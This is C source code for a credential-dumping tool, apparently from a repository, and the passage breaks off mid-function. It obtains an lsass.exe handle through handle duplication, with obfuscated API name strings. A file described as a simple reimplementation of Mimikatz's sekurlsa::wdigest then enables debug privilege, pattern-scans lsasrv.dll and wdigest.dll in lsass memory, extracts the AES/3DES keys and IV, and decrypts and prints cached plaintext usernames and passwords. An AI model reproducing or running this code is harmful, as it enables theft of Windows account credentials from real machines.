char qsysinfo[] = { 'N','t','Q','u','e','r','y','S','y','s','t','e','m','I','n','f','o','r','m','a','t','i','o','n',0};
char dupo[] = { 'N','t','D','u','p','l','i','c','a','t','e','O','b','j','e','c','t',0};
char qo[] = { 'N','t','Q','u','e','r','y','O','b','j','e','c','t',0};
char qfpi[] = { 'Q','u','e','r','y','F','u','l','l','P','r','o','c','e','s','s','I','m','a','g','e','N','a','m','e','W',0};
char op[] = { 'O','p','e','n','P','r','o','c','e','s','s',0};
_NtQuerySystemInformation ffNtQuery_SystemInformation = GetLibraryProcAddress(ntdll, qsysinfo);
_NtDuplicateObject ffNtDuplicate_Object = GetLibraryProcAddress(ntdll, dupo);
_NtQueryObject ffNtQuery_Object = GetLibraryProcAddress(ntdll, qo);
_NtQueryFullProcessImageNameW ffNtQuery_FullProcessImageNameW = GetLibraryProcAddress(kernel32, qfpi);
_NtOpenProcess ffNtOpen_Process = GetLibraryProcAddress(kernel32, op);
NTSTATUS status;
PSYSTEM_HANDLE_INFORMATION handleInfo;
ULONG handleInfoSize = 0x10000;
ULONG pid;
HANDLE processHandle;
ULONG i;
HANDLE lsass_handles = NULL;
handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
// NtQuerySystemInformation won't give us the correct buffer size,
// so we guess by doubling the buffer size.
while ((status = ffNtQuery_SystemInformation(
SystemHandleInformation,
handleInfo,
handleInfoSize,
NULL
)) == STATUS_INFO_LENGTH_MISMATCH)
handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2);
// NtQuerySystemInformation stopped giving us STATUS_INFO_LENGTH_MISMATCH.
if (!NT_SUCCESS(status)) {
printf("NtQuerySystemInformation failed!\n");
return 1;
}
for (i = 0; i < handleInfo->HandleCount; i++) {
SYSTEM_HANDLE handle = handleInfo->Handles[i];
HANDLE dupHandle = NULL;
POBJECT_TYPE_INFORMATION objectTypeInfo;
PVOID objectNameInfo;
UNICODE_STRING objectName;
ULONG returnLength;
// Check if PID belongs to System
if (handle.ProcessId == 4)
continue;
processHandle = ffNtOpen_Process(PROCESS_DUP_HANDLE, FALSE, handle.ProcessId);
// Duplicate the handle so we can query it.
if (!NT_SUCCESS(ffNtDuplicate_Object(
processHandle,
(void*)handle.Handle,
GetCurrentProcess(),
&dupHandle,
PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
0,
0
))) {
continue;
}
// Query the object type.
objectTypeInfo = (POBJECT_TYPE_INFORMATION)malloc(0x1000);
if (!NT_SUCCESS(ffNtQuery_Object(
dupHandle,
ObjectTypeInformation,
objectTypeInfo,
0x1000,
NULL
))) {
continue;
}
UNICODE_STRING objectType = *(PUNICODE_STRING)objectTypeInfo;
wchar_t path[MAX_PATH];
DWORD maxPath = MAX_PATH;
if (wcsstr(objectType.Buffer,L"Process") != NULL)
{
// Print handle, type and its PID
ffNtQuery_FullProcessImageNameW(dupHandle, 0, path, &maxPath);
if (wcsstr(path, L"lsass.exe") != NULL) {
printf("[%#x] %S: %d %ws\n", handle.Handle, objectType.Buffer, handle.ProcessId, path);
lsass_handles = dupHandle;
}
}
free(objectTypeInfo);
}
free(handleInfo);
return lsass_handles;
}
<|start_filename|>Example/sekurlsa_wdigest.c<|end_filename|>
#define WIN32_NO_STATUS
#define SECURITY_WIN32
#include <windows.h>
#include <psapi.h>
#include <ntsecapi.h>
#include <sspi.h>
#include <sddl.h>
#include <wincred.h>
#include <ntsecapi.h>
#include <ntsecpkg.h>
#include <stdio.h>
#include <bcrypt.h>
#include <ntstatus.h>
#include <tlhelp32.h>
#pragma comment(lib,"Bcrypt.lib")
#pragma comment(lib,"psapi.lib")
#pragma comment(lib, "advapi32.lib")
//** Offsets and Structs credited to Mimikatz **/
typedef struct _KIWI_WDIGEST_LIST_ENTRY {
struct _KIWI_WDIGEST_LIST_ENTRY* Flink;
struct _KIWI_WDIGEST_LIST_ENTRY* Blink;
ULONG UsageCount;
struct _KIWI_WDIGEST_LIST_ENTRY* This;
LUID LocallyUniqueIdentifier;
UNICODE_STRING UserName; // 0x30
UNICODE_STRING Domaine; // 0x40
UNICODE_STRING Password; // 0x50
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
typedef struct _KIWI_HARD_KEY {
ULONG cbSecret;
BYTE data[60]; // etc...
} KIWI_HARD_KEY, *PKIWI_HARD_KEY;
typedef struct _KIWI_BCRYPT_KEY {
ULONG size;
ULONG tag; // 'MSSK'
ULONG type;
ULONG unk0;
ULONG unk1;
ULONG bits;
KIWI_HARD_KEY hardkey;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
typedef struct _KIWI_BCRYPT_KEY81 {
ULONG size;
ULONG tag; // 'MSSK'
ULONG type;
ULONG unk0;
ULONG unk1;
ULONG unk2;
ULONG unk3;
ULONG unk4;
PVOID unk5; // before, align in x64
ULONG unk6;
ULONG unk7;
ULONG unk8;
ULONG unk9;
KIWI_HARD_KEY hardkey;
} KIWI_BCRYPT_KEY81, *PKIWI_BCRYPT_KEY81;
typedef struct _KIWI_BCRYPT_HANDLE_KEY {
ULONG size;
ULONG tag; // 'UUUR'
PVOID hAlgorithm;
PKIWI_BCRYPT_KEY81 key;
PVOID unk0;
} KIWI_BCRYPT_HANDLE_KEY, *PKIWI_BCRYPT_HANDLE_KEY;
// Signature used to find l_LogSessList (PTRN_WIN6_PasswdSet from Mimikatz)
unsigned char logSessListSig[] = { 0x48, 0x3b, 0xd9, 0x74 };
#define USERNAME_OFFSET 0x30
#define HOSTNAME_OFFSET 0x40
#define PASSWORD_OFFSET 0x50
//* End structs and offsets *//
// Holds extracted InitializationVector
unsigned char gInitializationVector[16];
// Holds extracted 3DES key
unsigned char gDesKey[24];
// Holds extracted AES key
unsigned char gAesKey[16];
// Decrypt wdigest cached credentials using AES or 3Des
ULONG DecryptCredentials(char* encrypedPass, DWORD encryptedPassLen, unsigned char* decryptedPass, ULONG decryptedPassLen) {
BCRYPT_ALG_HANDLE hProvider, hDesProvider;
BCRYPT_KEY_HANDLE hAes, hDes;
ULONG result;
NTSTATUS status;
unsigned char initializationVector[16];
// Same IV used for each cred, so we need to work on a local copy as this is updated
// each time by BCryptDecrypt
memcpy(initializationVector, gInitializationVector, sizeof(gInitializationVector));
if (encryptedPassLen % 8) {
// If suited to AES, lsasrv uses AES in CFB mode
printf("[-->] AES\n");
BCryptOpenAlgorithmProvider(&hProvider, BCRYPT_AES_ALGORITHM, NULL, 0);
BCryptSetProperty(hProvider, BCRYPT_CHAINING_MODE, (PBYTE)BCRYPT_CHAIN_MODE_CFB, sizeof(BCRYPT_CHAIN_MODE_CFB), 0);
BCryptGenerateSymmetricKey(hProvider, &hAes, NULL, 0, gAesKey, sizeof(gAesKey), 0);
status = BCryptDecrypt(hAes, (PUCHAR)encrypedPass, encryptedPassLen, 0, initializationVector, sizeof(gInitializationVector), decryptedPass, decryptedPassLen, &result, 0);
if (status != 0) {
return 0;
}
return result;
}
else {
// If suited to 3DES, lsasrv uses 3DES in CBC mode
printf("[-->] 3DES\n");
BCryptOpenAlgorithmProvider(&hDesProvider, BCRYPT_3DES_ALGORITHM, NULL, 0);
BCryptSetProperty(hDesProvider, BCRYPT_CHAINING_MODE, (PBYTE)BCRYPT_CHAIN_MODE_CBC, sizeof(BCRYPT_CHAIN_MODE_CBC), 0);
BCryptGenerateSymmetricKey(hDesProvider, &hDes, NULL, 0, gDesKey, sizeof(gDesKey), 0);
status = BCryptDecrypt(hDes, (PUCHAR)encrypedPass, encryptedPassLen, 0, initializationVector, 8, decryptedPass, decryptedPassLen, &result, 0);
if (status != 0) {
return 0;
}
return result;
}
}
// Read memory from LSASS process
SIZE_T ReadFromLsass(HANDLE hLsass, void* addr, void *memOut, int memOutLen) {
SIZE_T bytesRead = 0;
memset(memOut, 0, memOutLen);
ReadProcessMemory(hLsass, addr, memOut, memOutLen, &bytesRead);
return bytesRead;
}
// Searches for a provided pattern in memory and returns the offset
DWORD SearchPattern(unsigned char* mem, unsigned char* signature, DWORD signatureLen) {
ULONG offset = 0;
// Hunt for signature locally to avoid a load of RPM calls
for (int i = 0; i < 0x200000; i++) {
if (*(unsigned char*)(mem + i) == signature[0] && *(unsigned char*)(mem + i + 1) == signature[1]) {
if (memcmp(mem + i, signature, signatureLen) == 0) {
// Found the signature
offset = i;
break;
}
}
}
return offset;
}
// Recoveres AES, 3DES and IV from lsass memory required to decrypt wdigest credentials
int FindKeysOnWin7(HANDLE hLsass, char* lsasrvMem) {
BYTE PTRN_WNO8_LsaInitializeProtectedMemory_KEY[] = { 0x83, 0x64, 0x24, 0x30, 0x00, 0x44, 0x8b, 0x4c, 0x24, 0x48, 0x48, 0x8b, 0x0d };
int IV_OFFSET = 59;
int DES_OFFSET = -61;
int AES_OFFSET = 25;
DWORD keySigOffset = 0;
DWORD ivOffset = 0;
DWORD desOffset = 0, aesOffset = 0;
KIWI_BCRYPT_HANDLE_KEY h3DesKey, hAesKey;
KIWI_BCRYPT_KEY extracted3DesKey, extractedAesKey;
void* keyPointer = NULL;
// Load lsasrv.dll locally to avoid multiple ReadProcessMemory calls into lsass
unsigned char *lsasrvLocal = (unsigned char*)LoadLibraryA("lsasrv.dll");
if (lsasrvLocal == (unsigned char*)0) {
printf("[x] Error: Could not load lsasrv.dll locally\n");
return 1;
}
printf("[*] Loaded lsasrv.dll locally at address %p\n", lsasrvLocal);
// Search for AES/3Des/IV signature within lsasrv.dll and grab the offset
keySigOffset = SearchPattern(lsasrvLocal, PTRN_WNO8_LsaInitializeProtectedMemory_KEY, sizeof(PTRN_WNO8_LsaInitializeProtectedMemory_KEY));
if (keySigOffset == 0) {
printf("[x] Error: Could not find offset to AES/3Des/IV keys\n");
return 1;
}
printf("[*] Found offset to AES/3Des/IV at %d\n", keySigOffset);
// Retrieve offset to InitializationVector address due to "lea reg, [InitializationVector]" instruction
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + IV_OFFSET, (char*)&ivOffset, 4);
printf("[*] InitializationVector offset found as %d\n", ivOffset);
// Read InitializationVector (16 bytes)
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + IV_OFFSET + 4 + ivOffset, gInitializationVector, 16);
printf("[*] InitializationVector recovered as:\n");
printf("[*] ====[ Start ]====\n[*] ");
for (int i = 0; i < 16; i++) {
printf("%02x ", gInitializationVector[i]);
}
printf("\n[*] ====[ End ]===\n");
// Retrieve offset to h3DesKey address due to "lea reg, [h3DesKey]" instruction
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + DES_OFFSET, &desOffset, 4);
printf("[*] h3DesKey offset found as %d\n", desOffset);
// Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + DES_OFFSET + 4 + desOffset, &keyPointer, sizeof(char*));
// Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
ReadFromLsass(hLsass, keyPointer, &h3DesKey, sizeof(KIWI_BCRYPT_HANDLE_KEY));
// Read in the 3DES key
ReadFromLsass(hLsass, h3DesKey.key, &extracted3DesKey, sizeof(KIWI_BCRYPT_KEY));
printf("[*] 3Des Key recovered as:\n");
printf("[*] ====[ Start ]====\n[*] ");
memcpy(gDesKey, extracted3DesKey.hardkey.data, extracted3DesKey.hardkey.cbSecret);
for (unsigned int i = 0; i < extracted3DesKey.hardkey.cbSecret; i++) {
printf("%02x ", gDesKey[i]);
}
printf("\n[*] ====[ End ]===\n");
// Retrieve offset to hAesKey address due to "lea reg, [hAesKey]" instruction
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + AES_OFFSET, &aesOffset, 4);
// Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + AES_OFFSET + 4 + aesOffset, &keyPointer, sizeof(char*));
// Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
ReadFromLsass(hLsass, keyPointer, &hAesKey, sizeof(KIWI_BCRYPT_HANDLE_KEY));
// Read in AES key
ReadFromLsass(hLsass, hAesKey.key, &extractedAesKey, sizeof(KIWI_BCRYPT_KEY));
printf("[*] Aes Key recovered as:\n");
printf("[*] ====[ Start ]====\n[*] ");
memcpy(gAesKey, extractedAesKey.hardkey.data, extractedAesKey.hardkey.cbSecret);
for (unsigned int i = 0; i < extractedAesKey.hardkey.cbSecret; i++) {
printf("%02x ", gAesKey[i]);
}
printf("\n[*] ====[ End ]===\n");
return 0;
}
// Recoveres AES, 3DES and IV from lsass memory required to decrypt wdigest credentials
int FindKeysOnWin8(HANDLE hLsass, char* lsasrvMem) {
BYTE PTRN_WIN8_LsaInitializeProtectedMemory_KEY[] = { <KEY> };
int IV_OFFSET = 62;
int DES_OFFSET = -70;
int AES_OFFSET = 23;
DWORD keySigOffset = 0;
DWORD ivOffset = 0;
DWORD desOffset = 0, aesOffset = 0;
KIWI_BCRYPT_HANDLE_KEY h3DesKey, hAesKey;
KIWI_BCRYPT_KEY81 extracted3DesKey, extractedAesKey;
void* keyPointer = NULL;
// Load lsasrv.dll locally to avoid multiple ReadProcessMemory calls into lsass
unsigned char *lsasrvLocal = (unsigned char*)LoadLibraryA("lsasrv.dll");
if (lsasrvLocal == (unsigned char*)0) {
printf("[x] Error: Could not load lsasrv.dll locally\n");
return 1;
}
printf("[*] Loaded lsasrv.dll locally at address %p\n", lsasrvLocal);
// Search for AES/3Des/IV signature within lsasrv.dll and grab the offset
keySigOffset = SearchPattern(lsasrvLocal, PTRN_WIN8_LsaInitializeProtectedMemory_KEY, sizeof(PTRN_WIN8_LsaInitializeProtectedMemory_KEY));
if (keySigOffset == 0) {
printf("[x] Error: Could not find offset to AES/3Des/IV keys\n");
return 1;
}
printf("[*] Found offset to AES/3Des/IV at %d\n", keySigOffset);
// Retrieve offset to InitializationVector address due to "lea reg, [InitializationVector]" instruction
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + IV_OFFSET, (char*)&ivOffset, 4);
printf("[*] InitializationVector offset found as %d\n", ivOffset);
// Read InitializationVector (16 bytes)
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + IV_OFFSET + 4 + ivOffset, gInitializationVector, 16);
printf("[*] InitializationVector recovered as:\n");
printf("[*] ====[ Start ]====\n[*] ");
for (int i = 0; i < 16; i++) {
printf("%02x ", gInitializationVector[i]);
}
printf("\n[*] ====[ End ]===\n");
// Retrieve offset to h3DesKey address due to "lea reg, [h3DesKey]" instruction
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + DES_OFFSET, &desOffset, 4);
printf("[*] h3DesKey offset found as %d\n", desOffset);
// Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + DES_OFFSET + 4 + desOffset, &keyPointer, sizeof(char*));
// Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
ReadFromLsass(hLsass, keyPointer, &h3DesKey, sizeof(KIWI_BCRYPT_HANDLE_KEY));
// Read in the 3DES key
ReadFromLsass(hLsass, h3DesKey.key, &extracted3DesKey, sizeof(KIWI_BCRYPT_KEY));
printf("[*] 3Des Key recovered as:\n");
printf("[*] ====[ Start ]====\n[*] ");
memcpy(gDesKey, extracted3DesKey.hardkey.data, extracted3DesKey.hardkey.cbSecret);
for (unsigned int i = 0; i < extracted3DesKey.hardkey.cbSecret; i++) {
printf("%02x ", gDesKey[i]);
}
printf("\n[*] ====[ End ]===\n");
// Retrieve offset to hAesKey address due to "lea reg, [hAesKey]" instruction
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + AES_OFFSET, &aesOffset, 4);
// Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + AES_OFFSET + 4 + aesOffset, &keyPointer, sizeof(char*));
// Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
ReadFromLsass(hLsass, keyPointer, &hAesKey, sizeof(KIWI_BCRYPT_HANDLE_KEY));
// Read in AES key
ReadFromLsass(hLsass, hAesKey.key, &extractedAesKey, sizeof(KIWI_BCRYPT_KEY));
printf("[*] Aes Key recovered as:\n");
printf("[*] ====[ Start ]====\n[*] ");
memcpy(gAesKey, extractedAesKey.hardkey.data, extractedAesKey.hardkey.cbSecret);
for (unsigned int i = 0; i < extractedAesKey.hardkey.cbSecret; i++) {
printf("%02x ", gAesKey[i]);
}
printf("\n[*] ====[ End ]===\n");
return 0;
}
// Recoveres AES, 3DES and IV from lsass memory required to decrypt wdigest credentials
// before Win10_1903
int FindKeysOnWin10(HANDLE hLsass, char* lsasrvMem) {
BYTE PTRN_WN10_LsaInitializeProtectedMemory_KEY[] = { 0x83, 0x64, 0x24, 0x30, 0x00, 0x48, 0x8d, 0x45, 0xe0, 0x44, 0x8b, 0x4d, 0xd8, 0x48, 0x8d, 0x15 };
int IV_OFFSET = 61;
int DES_OFFSET = -73;
int AES_OFFSET = 16;
DWORD keySigOffset = 0;
DWORD ivOffset = 0;
DWORD desOffset = 0, aesOffset = 0;
KIWI_BCRYPT_HANDLE_KEY h3DesKey, hAesKey;
KIWI_BCRYPT_KEY81 extracted3DesKey, extractedAesKey;
void* keyPointer = NULL;
// Load lsasrv.dll locally to avoid multiple ReadProcessMemory calls into lsass
unsigned char *lsasrvLocal = (unsigned char*)LoadLibraryA("lsasrv.dll");
if (lsasrvLocal == (unsigned char*)0) {
printf("[x] Error: Could not load lsasrv.dll locally\n");
return 1;
}
printf("[*] Loaded lsasrv.dll locally at address %p\n", lsasrvLocal);
// Search for AES/3Des/IV signature within lsasrv.dll and grab the offset
keySigOffset = SearchPattern(lsasrvLocal, PTRN_WN10_LsaInitializeProtectedMemory_KEY, sizeof(PTRN_WN10_LsaInitializeProtectedMemory_KEY));
if (keySigOffset == 0) {
printf("[x] Error: Could not find offset to AES/3Des/IV keys\n");
return 1;
}
printf("[*] Found offset to AES/3Des/IV at %d\n", keySigOffset);
// Retrieve offset to InitializationVector address due to "lea reg, [InitializationVector]" instruction
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + IV_OFFSET, (char*)&ivOffset, 4);
printf("[*] InitializationVector offset found as %d\n", ivOffset);
// Read InitializationVector (16 bytes)
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + IV_OFFSET + 4 + ivOffset, gInitializationVector, 16);
printf("[*] InitializationVector recovered as:\n");
printf("[*] ====[ Start ]====\n[*] ");
for (int i = 0; i < 16; i++) {
printf("%02x ", gInitializationVector[i]);
}
printf("\n[*] ====[ End ]===\n");
// Retrieve offset to h3DesKey address due to "lea reg, [h3DesKey]" instruction
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + DES_OFFSET, &desOffset, 4);
printf("[*] h3DesKey offset found as %d\n", desOffset);
// Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + DES_OFFSET + 4 + desOffset, &keyPointer, sizeof(char*));
// Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
ReadFromLsass(hLsass, keyPointer, &h3DesKey, sizeof(KIWI_BCRYPT_HANDLE_KEY));
// Read in the 3DES key
ReadFromLsass(hLsass, h3DesKey.key, &extracted3DesKey, sizeof(KIWI_BCRYPT_KEY));
printf("[*] 3Des Key recovered as:\n");
printf("[*] ====[ Start ]====\n[*] ");
memcpy(gDesKey, extracted3DesKey.hardkey.data, extracted3DesKey.hardkey.cbSecret);
for (unsigned int i = 0; i < extracted3DesKey.hardkey.cbSecret; i++) {
printf("%02x ", gDesKey[i]);
}
printf("\n[*] ====[ End ]===\n");
// Retrieve offset to hAesKey address due to "lea reg, [hAesKey]" instruction
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + AES_OFFSET, &aesOffset, 4);
// Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + AES_OFFSET + 4 + aesOffset, &keyPointer, sizeof(char*));
// Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
ReadFromLsass(hLsass, keyPointer, &hAesKey, sizeof(KIWI_BCRYPT_HANDLE_KEY));
// Read in AES key
ReadFromLsass(hLsass, hAesKey.key, &extractedAesKey, sizeof(KIWI_BCRYPT_KEY));
printf("[*] Aes Key recovered as:\n");
printf("[*] ====[ Start ]====\n[*] ");
memcpy(gAesKey, extractedAesKey.hardkey.data, extractedAesKey.hardkey.cbSecret);
for (unsigned int i = 0; i < extractedAesKey.hardkey.cbSecret; i++) {
printf("%02x ", gAesKey[i]);
}
printf("\n[*] ====[ End ]===\n");
return 0;
}
// Reads out a LSA_UNICODE_STRING from lsass address provided
UNICODE_STRING *ExtractUnicodeString(HANDLE hLsass, char* addr) {
UNICODE_STRING *str;
WORD* mem;
str = (UNICODE_STRING*)LocalAlloc(LPTR, sizeof(UNICODE_STRING));
// Read LSA_UNICODE_STRING from lsass memory
ReadFromLsass(hLsass, addr, str, sizeof(UNICODE_STRING));
mem = (WORD*)LocalAlloc(LPTR, str->MaximumLength);
if (mem == (WORD*)0) {
LocalFree(str);
return NULL;
}
// Read the buffer contents for the LSA_UNICODE_STRING from lsass memory
ReadFromLsass(hLsass, *(void**)((char*)str + 8), mem, str->MaximumLength);
str->Buffer = (PWSTR)mem;
return str;
}
// Free memory allocated within getUnicodeString
void FreeUnicodeString(UNICODE_STRING* unicode) {
LocalFree(unicode->Buffer);
LocalFree(unicode);
}
// Hunts through wdigest and extracts credentials to be decrypted
int FindCredentials(HANDLE hLsass, char* wdigestMem) {
KIWI_WDIGEST_LIST_ENTRY entry;
DWORD logSessListSigOffset, logSessListOffset;
unsigned char* logSessListAddr;
unsigned char* wdigestLocal;
unsigned char* llCurrent, *llStart;
unsigned char passDecrypted[1024];
// Load wdigest.dll locally to avoid multiple ReadProcessMemory calls into lsass
wdigestLocal = (unsigned char*)LoadLibraryA("wdigest.dll");
if (wdigestLocal == NULL) {
printf("[x] Error: Could not load wdigest.dll into local process\n");
return 1;
}
printf("[*] Loaded wdigest.dll at address %p\n", wdigestLocal);
// Search for l_LogSessList signature within wdigest.dll and grab the offset
logSessListSigOffset = SearchPattern(wdigestLocal, logSessListSig, sizeof(logSessListSig));
if (logSessListSigOffset == 0) {
printf("[x] Error: Could not find l_LogSessList signature\n");
return 1;
}
printf("[*] l_LogSessList offset found as %d\n", logSessListSigOffset);
// Read memory offset to l_LogSessList from a "lea reg, [l_LogSessList]" asm
ReadFromLsass(hLsass, wdigestMem + logSessListSigOffset - 4, &logSessListOffset, sizeof(DWORD));
// Read pointer at address to get the true memory location of l_LogSessList
ReadFromLsass(hLsass, wdigestMem + logSessListSigOffset + logSessListOffset, &logSessListAddr, sizeof(char*));
printf("[*] l_LogSessList found at address %p\n", logSessListAddr);
printf("[*] Credentials incoming... (hopefully)\n\n");
// Read first entry from linked list
ReadFromLsass(hLsass, logSessListAddr, &entry, sizeof(KIWI_WDIGEST_LIST_ENTRY));
llCurrent = (unsigned char*)entry.This;
do {
memset(&entry, 0, sizeof(entry));
// Read entry from linked list
ReadFromLsass(hLsass, llCurrent, &entry, sizeof(KIWI_WDIGEST_LIST_ENTRY));
if (entry.UsageCount == 1) {
UNICODE_STRING* username = ExtractUnicodeString(hLsass, (char*)llCurrent + USERNAME_OFFSET);
UNICODE_STRING * hostname = ExtractUnicodeString(hLsass, (char*)llCurrent + HOSTNAME_OFFSET);
UNICODE_STRING * password = ExtractUnicodeString(hLsass, (char*)llCurrent + PASSWORD_OFFSET);
if (username != NULL && username->Length != 0) {
printf("\n[-->] Username: %ls\n", username->Buffer);
}
else {
printf("\n[-->] Username: [NULL]\n");
}
if (hostname != NULL && hostname->Length != 0) {
printf("[-->] Hostname: %ls\n", hostname->Buffer);
}
else {
printf("[-->] Hostname: [NULL]\n");
}
// Check if password is present
if (password->Length != 0 && (password->Length % 2) == 0) {
// Decrypt password using recovered AES/3Des keys and IV
if (DecryptCredentials((char*)password->Buffer, password->MaximumLength, passDecrypted, sizeof(passDecrypted)) > 0) {
printf("[-->] Password: %ls\n\n", passDecrypted);
}
}
else {
printf("[-->] Password: [<PASSWORD>]\n\n");
}
FreeUnicodeString(username);
FreeUnicodeString(hostname);
FreeUnicodeString(password);
}
llCurrent = (unsigned char*)entry.Flink;
} while (llCurrent != logSessListAddr);
return 0;
}
// Searches for lsass.exe PID
int GetLsassPid() {
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
if (Process32First(hSnapshot, &entry)) {
while (Process32Next(hSnapshot, &entry)) {
if (wcscmp(entry.szExeFile, L"lsass.exe") == 0) {
return entry.th32ProcessID;
}
}
}
CloseHandle(hSnapshot);
return 0;
}
BOOL EnableDebugPrivilege(BOOL fEnable)
{
BOOL fOk = FALSE;
HANDLE hToken;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
{
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED : 0;
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
fOk = (GetLastError() == ERROR_SUCCESS);
CloseHandle(hToken);
}
return(fOk);
}
int GetOSVersion()
{
typedef void(__stdcall*NTPROC)(DWORD*, DWORD*, DWORD*);
HINSTANCE hinst = LoadLibrary(L"ntdll.dll");
DWORD dwMajor, dwMinor, dwBuildNumber;
NTPROC proc = (NTPROC)GetProcAddress(hinst, "RtlGetNtVersionNumbers");
proc(&dwMajor, &dwMinor, &dwBuildNumber);
if (dwMajor == 10 && dwMinor == 0) {
printf("[*] OS: Windows 10\n");
return 3;
}
SYSTEM_INFO info;
GetSystemInfo(&info);
OSVERSIONINFOEX os;
os.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
if (GetVersionEx((OSVERSIONINFO *)&os))
{
switch (os.dwMajorVersion)
{
case 6:
switch (os.dwMinorVersion)
{
case 0:
if (os.wProductType == VER_NT_WORKSTATION) {
printf("[*] OS: Windows Vista\n");
return 1;
}
else {
printf("[*] OS: Windows Server 2008\n");
return 1;
}
case 1:
if (os.wProductType == VER_NT_WORKSTATION)
printf("[*] OS: Windows 7\n");
else
printf("[*] OS:Windows Windows Server 2008 R2\n");
return 1;
case 2:
if (os.wProductType == VER_NT_WORKSTATION)
printf("[*] OS: Windows 8\n");
else
printf("[*] OS: Windows Server 2012\n");
return 2;
}
break;
default:
printf("[!] Too old\n");
}
}
else
printf("[!] Error\n");
return 0;
}
int main()
{
printf("\nUse to get plain-text credentials of the 64-bit OS.\n");
printf("This is a simple implementation of Mimikatz's sekurlsa::wdigest\n\n");
printf("Support:\n");
printf(" - Win7 x64/Windows Server 2008 x64/Windows Server 2008R2 x64\n");
printf(" - Win8 x64/Windows Server 2012 x64/Windows Server 2012R2 x64\n");
printf(" - Win10_1507(and before 1903) x64\n\n");
printf("Source: https://gist.github.com/xpn/12a6907a2fce97296428221b3bd3b394 \n");
printf("The following functions have been added:\n");
printf(" - EnableDebugPrivilege\n");
printf(" - GetOSVersion\n");
printf(" - Support different OS\n\n");
if (!EnableDebugPrivilege(TRUE))
{
printf("[!]AdjustTokenPrivileges Failed.<%d>\n", GetLastError());
}
HANDLE hLsass;
HMODULE lsassDll[1024];
DWORD bytesReturned;
char modName[MAX_PATH];
char* lsass = NULL, *lsasrv = NULL, *wdigest = NULL;
// Enum LSASS like pypykatz and open up a PROCESS_QUERY_INFORMATION | PROCESS_VM_READ handle to lsass process
hLsass = enum_lsass_handles();
if (hLsass == INVALID_HANDLE_VALUE) {
printf("[x] Error: Could not open handle to lsass process\n");
return 1;
}
// Enumerate all loaded modules within lsass process
if (EnumProcessModules(hLsass, lsassDll, sizeof(lsassDll), &bytesReturned)) {
// For each DLL address, get its name so we can find what we are looking for
for (int i = 0; i < bytesReturned / sizeof(HMODULE); i++) {
GetModuleFileNameExA(hLsass, lsassDll[i], modName, sizeof(modName));
// Find DLL's we want to hunt for signatures within
if (strstr(modName, "lsass.exe") != (char*)0)
lsass = (char*)lsassDll[i];
else if (strstr(modName, "wdigest.DLL") != (char*)0)
wdigest = (char*)lsassDll[i];
else if (strstr(modName, "lsasrv.dll") != (char*)0)
lsasrv = (char*)lsassDll[i];
}
}
else
{
printf("[!]Error code of EnumProcessModules():%d\n", GetLastError());
return 0;
}
// Make sure we have all the DLLs that we require
if (lsass == NULL || wdigest == NULL || lsasrv == NULL) {
printf("[x] Error: Could not find all DLL's in LSASS :(\n");
return 1;
}
printf("[*] lsass.exe found at %p\n", lsass);
printf("[*] wdigest.dll found at %p\n", wdigest);
printf("[*] lsasrv.dll found at %p\n", lsasrv);
// Now we need to search through lsass for the AES, 3DES, and IV values
int flag = GetOSVersion();
if (flag == 0)
return 0;
else if (flag == 1) {
if (FindKeysOnWin7(hLsass, lsasrv) != 0) {
printf("[x] Error: Could not find keys in lsass\n");
return 1;
}
}
else if (flag == 2) {
BYTE keyIVSig[] = { 0x83, 0x64, 0x24, 0x30, 0x00, 0x44, 0x8b, 0x4d, 0xd8, 0x48, 0x8b, 0x0d };
if (FindKeysOnWin8(hLsass, lsasrv) != 0) {
printf("[x] Error: Could not find keys in lsass\n");
return 1;
}
}
else if (flag == 3) {
//For Win10_1507
if (FindKeysOnWin10(hLsass, lsasrv) != 0) {
